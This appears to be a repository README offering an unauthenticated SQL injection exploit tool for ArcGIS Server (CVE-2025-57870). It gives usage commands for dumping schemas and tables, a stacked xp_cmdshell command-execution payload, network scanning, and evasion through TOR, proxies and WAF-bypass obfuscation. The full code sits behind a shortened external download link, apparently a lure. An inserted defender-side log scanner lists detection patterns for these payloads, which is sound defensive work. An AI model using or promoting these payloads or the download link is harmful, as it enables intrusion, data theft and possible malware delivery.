Associated vulnerability
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server
Introduction
# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870
This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.
**Note:** Full source code access - **[href](https://tinyurl.com/3zjbu33f)**. This repository contains core exploit logic and utilities for authorized testing.
## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.
## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4`: A video instruction manual.
## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`
## Setup
1. Configure `config.yaml` with target details:
```yaml
target:
  url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
  db_type: "mssql"   # Options: mssql, oracle, postgres
proxy:
  enabled: false
  type: "socks5"
  address: "127.0.0.1:9050"
logging:
  level: "debug"
  output_dir: "exploited_data"
```
2. Scan for vulnerable servers:
`python scanner.py --network 192.168.1.0/24 --port 6080`
## Usage
Run the exploit:
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`
### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).
### Examples
1. Dump database schema (MSSQL):
`python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`
2. Dump specific table (Oracle):
`python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`
3. Attempt RCE (MSSQL xp_cmdshell):
`python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`
## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.
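As an added defender-side example (not part of this repository or its tool): the request shapes this README describes, requests to a Feature Service `/query` endpoint carrying `/**/` comment obfuscation, time-based blind delays, or a stacked `xp_cmdshell` call, can be flagged from ordinary web-server access logs. The log lines below are constructed; the README does not say which query parameter is injectable, so every decoded parameter is inspected (an assumption).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic): line 1 is a normal Feature
# Service query, lines 2-3 carry indicators the README describes, line 4 is not a
# FeatureServer /query request and is ignored.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2026:10:00:01 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=1%3D1&outFields=*&f=json HTTP/1.1" 200 812
10.0.0.9 - - [12/Jan/2026:10:00:07 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=1%3D1%3B%20EXEC%20xp_cmdshell%20%27whoami%27%20--&f=json HTTP/1.1" 500 91
10.0.0.9 - - [12/Jan/2026:10:00:09 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=1%3D1%3BWAITFOR/**/DELAY/**/%270:0:5%27--&f=json HTTP/1.1" 200 120
10.0.0.7 - - [12/Jan/2026:10:00:11 +0000] "GET /arcgis/rest/services/Roads/MapServer/0/query?where=NAME%3D%27Main%27&f=json HTTP/1.1" 200 455
"""

# Common log format: client IP, timestamp, request line, HTTP status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
FEATURE_QUERY_RE = re.compile(r"/FeatureServer/\d+/query$", re.IGNORECASE)

# Indicators taken from the README: stacked xp_cmdshell, /**/ comment obfuscation,
# and time-based blind primitives for the three backends it names.
INDICATORS = {
    "stacked_xp_cmdshell": re.compile(r";\s*exec\b[^;]*xp_cmdshell", re.IGNORECASE),
    "comment_obfuscation": re.compile(r"/\*\*/"),
    "time_based_blind": re.compile(r"\bwaitfor\b|\bpg_sleep\b|dbms_lock\.sleep", re.IGNORECASE),
    "stacked_statement": re.compile(r";\s*(?:exec|select|insert|update|delete|drop|waitfor)\b", re.IGNORECASE),
}

def classify_params(params):
    """Return sorted indicator names found in any decoded query-parameter value."""
    hits = set()
    for value in (v for values in params.values() for v in values):
        # Also test with /**/ collapsed to a space, so keyword patterns still see
        # tokens that were split with comments (e.g. WAITFOR/**/DELAY).
        candidates = (value, value.replace("/**/", " "))
        hits.update(n for n, p in INDICATORS.items() if any(p.search(c) for c in candidates))
    return sorted(hits)

def scan_log(text):
    """Return (client_ip, status, indicators) for suspicious FeatureServer /query requests."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not FEATURE_QUERY_RE.search(url.path):
            continue
        hits = classify_params(parse_qs(url.query, keep_blank_values=True))
        if hits:
            alerts.append((m.group("ip"), int(m.group("status")), hits))
    return alerts
```

A 500 status paired with a stacked-statement indicator, as in the second sample line, is the error-based pattern; repeated 200s from one client with delay primitives point at the blind mode.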
## Get the exploit
### **[href](https://tinyurl.com/3zjbu33f)**
## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.
## Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com
File snapshot
[4.0K] /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K] README.md
0 directories, 1 file